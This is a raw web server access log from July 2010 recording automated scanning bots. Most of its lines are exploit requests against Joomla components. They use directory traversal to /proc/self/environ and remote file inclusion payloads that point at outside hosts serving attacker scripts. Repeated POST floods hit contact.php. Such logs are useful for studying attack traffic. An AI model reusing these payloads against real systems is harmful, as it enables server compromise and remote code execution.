87.229.22.22 - - [05/Jul/2010:02:22:43 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:22:43 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:22:44 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:22:51 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
207.46.195.236 - - [05/Jul/2010:02:23:03 -0500] "GET /logs/access_log.1244592000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.222.0.45 - - [05/Jul/2010:02:23:08 -0500] "GET /logs/access_log.1276300800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:08 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:08 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:09 -0500] "GET /logs/access_log.1275609600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:13 -0500] "GET /logs/access_log.1276300800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:14 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:14 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:23:15 -0500] "GET /logs/access_log.1275609600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.229.22.22 - - [05/Jul/2010:02:23:25 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:23:25 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:23:26 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
194.109.22.66 - - [05/Jul/2010:02:23:49 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:23:55 -0500] "GET /logs/access_log.1275264000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:23:55 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:23:55 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:24:01 -0500] "GET /logs/access_log.1276128000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
87.229.22.22 - - [05/Jul/2010:02:24:12 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:24:12 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:24:13 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:24:16 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
72.52.129.208 - - [05/Jul/2010:02:24:21 -0500] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
194.109.22.66 - - [05/Jul/2010:02:24:36 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:24:36 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:24:37 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:24:41 -0500] "GET /logs/access_log.1275264000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
72.52.129.208 - - [05/Jul/2010:02:24:58 -0500] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.229.22.22 - - [05/Jul/2010:02:25:03 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
194.109.22.66 - - [05/Jul/2010:02:25:39 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
80.93.62.100 - - [05/Jul/2010:02:26:08 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:02:26:08 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:02:26:09 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:02:26:09 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
194.109.22.66 - - [05/Jul/2010:02:27:07 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
72.52.129.208 - - [05/Jul/2010:02:27:45 -0500] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
194.109.22.66 - - [05/Jul/2010:02:28:12 -0500] "GET /logs/access_log.1275264000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:12 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:13 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:13 -0500] "GET /logs/access_log.1276214400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:23 -0500] "GET /logs/access_log.1275264000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:24 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:24 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:27 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:28:33 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:35 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:36 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
78.129.180.149 - - [05/Jul/2010:02:29:36 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.60.176.46 - - [05/Jul/2010:02:29:54 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:29:54 -0500] "GET /logs/access_log.1277164800%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:29:54 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
194.109.22.66 - - [05/Jul/2010:02:29:59 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:30:23 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
92.60.176.46 - - [05/Jul/2010:02:30:54 -0500] "GET /logs/access_log.1275609600%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
174.121.93.221 - - [05/Jul/2010:02:31:48 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:02:31:48 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:02:31:48 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:02:31:51 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:02:31:51 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:02:31:51 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
92.60.176.46 - - [05/Jul/2010:02:32:07 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:32:07 -0500] "GET /logs/access_log.1277164800%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:32:07 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:32:31 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:32:31 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:32:33 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
194.109.22.66 - - [05/Jul/2010:02:32:34 -0500] "GET /logs/access_log.1277251200/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:32:34 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:32:34 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:32:36 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:32:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
92.60.176.46 - - [05/Jul/2010:02:32:56 -0500] "GET /logs/access_log.1275609600%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:33:30 -0500] "GET /logs/access_log.1275609600%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
74.222.0.45 - - [05/Jul/2010:02:34:03 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.222.0.45 - - [05/Jul/2010:02:34:03 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
194.109.22.66 - - [05/Jul/2010:02:36:19 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:38:10 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:38:11 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:38:11 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:38:19 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
92.60.176.46 - - [05/Jul/2010:02:40:34 -0500] "GET //?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:40:34 -0500] "GET /logs/access_log.1275091200//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:40:34 -0500] "GET /logs/access_log.1275609600//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:40:34 -0500] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12140 "-""MaMa CaSpEr"
194.109.22.66 - - [05/Jul/2010:02:40:37 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:40:37 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:40:37 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:40:41 -0500] "GET /logs/access_log.1277251200/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
72.52.129.208 - - [05/Jul/2010:02:41:51 -0500] "GET /logs/access_log.1276128000//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
72.52.129.208 - - [05/Jul/2010:02:41:51 -0500] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
72.52.129.208 - - [05/Jul/2010:02:41:51 -0500] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
